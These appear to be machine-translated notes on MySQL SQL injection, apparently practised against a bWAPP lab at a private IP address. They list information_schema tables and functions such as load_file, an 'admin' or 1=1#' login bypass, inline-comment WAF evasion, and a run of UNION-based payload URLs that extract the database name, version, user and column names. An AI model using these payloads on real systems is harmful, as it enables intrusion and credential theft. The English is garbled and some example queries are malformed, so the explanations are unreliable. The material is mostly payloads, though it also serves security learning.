information_schema (after MySQL5.0 version, MySQL database to store a default information_schema database)
information_schema three tables:
SCHEMATA: The fields in the table SCHEMA_NAME store all the library name of the database created by the user.
TABLES: The tables in the field TABLE_SCHEMA, TABLE_NAME were all database records database and table names created by the user.
COLUMNS: TABLE_SCHEMA field in the table, TABLE_NAME, COLUMN_NAME all database records are created by the user library name, table names, field names.
Check for phrases
FROM SELECT field name library name to be queried. Table name
SELECT name FROM database field name to be queried. Known conditions table WHERE field name = "value known conditions'
SELECT name FROM database field name to be queried. Known conditions table WHERE field name = "value known conditions' AND conditions known in the field name = 2 'is a known value 2'
SELECT * FROM users
SELECT * FROM users limit 0,1
Important function (when used to inject query sensitive information)
database (): Use the current site database
version (): The current database version number
user (): The current database user
concat_ws (): a multiple-entry display
load_file (): read the system file, read the file path must be converted to hexadecimal
The Notes
# Or - or spaces // ** //
select from username,password from where username = ‘admin’ and password = ‘123456’
admin’ or 1=1#
select from username,password from where username = ‘admin’or 1=1#’and password = ‘123456’
Inline comments (WAF bypass for other protective)
/*!code*/
/*!union*/ /*!select*/ 1,2,3
Union joint inquiry injection attacks
http://192.168.100.130/sqli_2.php?movie=4%E2%80%98&action=go
http://192.168.100.130/sqli_2.php?movie=4%20and%201=1&action=go
http://192.168.100.130/sqli_2.php?movie=4%20and%201=2&action=go
http://192.168.100.130/sqli_2.php?movie=4%20order%20by%207--+&action=go confirm the number of table
http://192.168.100.130/sqli_2.php?movie=-4%20union%20select%201,2,3,4,5,6,7%20--+&action=go
http://192.168.100.130/sqli_2.php?movie=-4%20union%20select%201,database(),version(),4,user(),6,7%20--+&action=go
The current database name: bWAPP
Current Database Version: 5.5.47
The current database user name: localhost
http://192.168.100.130/sqli_2.php?movie=-4 union select 1,table_name,3,4,5,6,7 from information_schema.tables limit 3,1-- &action=go
http://192.168.100.130/sqli_2.php?movie=-4%20union%20select%201,column_name,3,4,5,6,7%20from%20information_schema.columns%20where%20column_name=0x75736572%20limit%200,1--%20&action=go
http://192.168.100.130/sqli_2.php?movie=-4%20union%20select%201,column_name,3,4,5,6,7%20from%20information_schema.columns%20where%20column_name=0x70617373776f7264%20limit%200,1--%20&action=go